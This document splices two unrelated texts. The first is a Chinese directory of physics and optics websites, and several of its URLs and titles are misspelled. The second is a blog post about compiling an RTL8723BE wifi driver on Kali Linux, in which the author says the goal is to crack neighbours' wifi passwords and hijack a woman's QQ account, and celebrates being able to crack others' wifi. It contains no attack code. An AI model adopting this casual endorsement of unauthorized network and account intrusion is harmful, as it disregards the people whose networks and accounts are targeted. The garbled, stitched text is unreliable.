声学与超声技术发展 http://www.iop.org/Books/Catalogue/170/_44/0750302453

物理声学和液体度量 http://www.iop.org/Books/Catalogue/170/_53/0750301139
该网站介绍怎样对液体的一种或多种特性进行精密测量的实验设计方法,以及如何把实验结果和媒介的热物理属性结合进行分析。

声学与噪音控制 http://www.ancoustics.com
该网站提供减噪消振知识的咨询服务,同时还销售减噪、测量和分析振动的软件和仪器。

——————————————————————————–

世界物理机构 http://www.physik.uni-oldenburg.de/Docs/home/phys-links.html
该网站提供到各国物理机构链接(按地区分类)。

美国物理协会 http://aps.org
该网站提供新闻、科研、奖学金、会员目录和在线杂志以及其他有关信息。

美国物理学中心 http://www.acp.org
该组织是物理学领域和物理协会众多研究项目的统一领导机构。

物理协会 http://www.physics.iastate.edu
该组织由依阿华州立大学和UNESCO提供资助。

美国物理研究所 http://www.aip.org/history

地球物理实验室 http://ltpwww.gsfc.nasa.gov
该网站介绍美国国家航空航天总署为增进人类对地球及其周围行行星的了解而开展的研究项目。

劳伦斯国家实验室 http://www.llnl.gov
该网站提供劳伦斯国家实验室的研究报告、论文和期刊以及其他信息。

东部奥兰多伯克利国家实验室 http://www.lbl.gov
该网站提供研究计划、图象、出版物、新闻和图书馆资料及其有关链接。

美国医药物理学家协会 http://www.aapm.org
该网站提供美国医学科学家协会会员信息以及医药物理学研究信息。

NIEHS分子生物物理实验室 http://alfred.niehs.nih,gov/LMB/home.html
该实验室为政府科研机构,可查询电磁共振旋转分离资料库。

欧洲粒子物理实验室 http://www.cem.ch
该网站提供一般信息、数据资料、会议和科研信息及其他资源。

耶鲁大学理论物理研究中心 http://www.yale.edu/physics/research/ctp.html
该网站介绍耶鲁大学理论物理研究中心,其研究范围主要包括以下几个领域:核物理、基本粒子和引力物理等。

麻省理工大学理论物理研究中心 http://ctpa02.mit.edu
该网站提供麻省理工大学理论物理研究中心有关粒子物理理论的报告、物理信息资源和最新论文等。

美国国家核物理数据中心(NNDC) http://www.nndc.bol.gov
该网站介绍布鲁克海文(Brookhaven)国家核物理数据中心提供的低能、中能核物理信息。

布朗大学高能物理研究小组 http://www.het.brown.edu
该网站提供布朗大学高能物理研究小组的资料和可下载的最新物理新闻。

NIST物理实验室 http://physics.nist.gov
该网站提供电子、光学和辐射技术的测量服务与研究。

X光光学中心(CXRO) http://www-cxro.lbl.gov
该网站提供有关X光反射学、X光与物质的相互作用和生物显微学等方面的信息。

美国同步加速器 http://www.nsls.bnl.gov
该网站介绍了布鲁克海文(Brookhaven)国家实验室的同步加速器,该加速装置产生的X射线、紫外线和红外线,可用于许多研究领域的实验中。

斯坦福大学线性加速器中心(SLAC) http://www.slac.stanford.edu/detailed.html

红外数据协会 http://www.irda.org
该网站介绍150个成员公司,并提供系统资源和有关网站的查询。

激光光学及光谱学协会 http://www.lsr.ph.ic.ac.uk
该网站提供伦敦皇家学院(Blackett)实验室的科研信息和专题讨论会目录。

应用光谱学协会 http://esther.la.asu.edu/sas
该网站介绍了该协会的期刊、简讯、会议、事件产品和服务等。 亚利桑纳州立大学光合作用研究中心 http://www.asu.edu/clas/photosyn

声学工程协会 http://www.acs.psu.edu/aes.html
该网站提供有关声学的会议、课题和科研信息及有关链接。

——————————————————————————–

英国光学会议 http://www.clearlight.com/mobilex
该会议每年10月29日~10月30日在英国召开。

现代物理学综述(Reviews of Modem Physics) http://rmp.aps.org
该杂志由美国物理学协会出版发行,内容包括学术综述和教材等。

物理学新闻(Physics News Update) http://www.hep.net/documents/newsletters/pnu/pnu.html
该网站内容由美国物理学协会提供。

相对性即时评论(Living Reviews Relativity) http://www.livingreviews.org
该杂志提供相对性研究领域内的综述和论文,并由作者周期性进行更新。

引力之事(Matters of Gravity) http://vishnu.nidrvana.phys.psu.edu/mog.html
该杂志介绍量子引力学、宇宙学、弦论(String Theory)等方面研究的新进展。

高能物理简讯与期刊 http://www.hep.net/documents/newsletters/newsletters.html
该网站提供高能物理学期刊网站和新闻组的链接。

高能物理学新闻(HEPnet News) http://www.hep.net/documents/new … ews/hepnetnews.html
该杂志由高能物理学网络资源中心出版发行。

光线(Beam Line) http://www.slac.stanford.edu/pubs/beamline/beamline.html
该杂志由斯坦福大学线性加速器中心出版发行。

激光世界 http://www.lfw.com
该网站是一本光学月刊,对全球光电技术研究、应用与市场分析进行通俗易懂的介绍。

欧洲激光(EuroLaser) http://www.eurolaser.de
该杂志讨论激光技术在工业中的应用,收集了大量来自工业企业、大学与科研机构的学术报告。

西部光子研究与贸易分析年刊 http://www.spie.org/info/pw
该网站介绍光学理论与技术的研究与商业信息,其中包括激光、光电子、电子成像和生物医学等领域中的光学应用。

应用光谱学杂志 http://esther.la.asu.edu/sas/joumal.html
该网站提供该杂志最近几期的主要内容和可检索的索引。

光学测试文摘(Optical Testing Digest) http://www.spie.org/otd
该杂志是由国际光学工程协会(SPIE)赞助和管理的非盈利性期刊。

近红外线光谱学期刊(Joumal of Near Infrared Spectroscopy)
http://www.impub.co.uk/nirp/jnirs.html

光谱学 http://www.wilson.ucsd.edu/educa … y/spectroscopy.html
该网站内容为光谱学入门电子读物。

未来之波(Wave of the Future) http://kerouac.pharm.uky.edu/ASRG/wave/wavehp.html
该杂志是一本有关化学和光谱学研究的电子刊物,该网站还提供教师、研究生和博士后等的论文。

表面科学领域(Surface Science Spectra) http://www.cems.umn.edu/~weaver/sss.html
该杂志由美国真空协会(Amercian Vacuum Society)赞助,提供XPS、AES和SIMS数据库,以及文章摘要、目录、订阅信息等。

kali linux(debian)安装无线网卡驱动

换了新电脑就想折腾一下,装个kali linux,然后破解一下家周围的wifi,顺便可以劫持个妹子的qq号啥的(YY流口水中。。)

好吧,回到正题,按照kali官方说明从U盘装完双系统后(原来是win7 64bit),点网络链接只有有线连接和vpn连接可以使用,插上网线,有网络访问,先一顿“apt-get update ,apt-get upgrade”,换源啥的。最后回到开始装kali的目的,用工具破解wifi密码(尼玛,装了半天 正事没有完成瞎折腾啥呀)

系统环境:

[email protected]:~# uname -a
Linux kow 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux

百度了一下,发现debian装驱动需要自己下载然后编译安装,那就老老实实按网上的步骤来吧

到官网下驱动,我的无线网卡型号是:RTL8723BE,结果到官网没找到驱动(可能太笨了吧,如果你找到了 email我一下是怎么找到的),然后在其他软件站上下载了一个。

解压,cd 进目录,make 好吧这步就出错了,首先是报错:

没有kernel-source吧,一开始编译就出问题,然后键入:

apt-get install linux-headers-$(uname -r)

第一个错误搞定。

 

        然后又出了一堆什么warning 认为成error,这个改了半天也没搞定(应该是编译器设置的问题),提示

_ieee80211_is_robust_mgmt_frame()这个函数没有,百度了一下,发现了这篇文章:

https://wiki.archlinux.org/index.php/Wireless_Setup_%28%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87%29

按照上面的方法,顺利解决问题,安装好了驱动,可以愉快的破解别人wifi了

写在最后:

吐槽一下国内的各种论坛博客,大多数人的问题要么下面没人回答,要么乱回答,你回复问题好歹你自己先试一下啊,语句都是错的。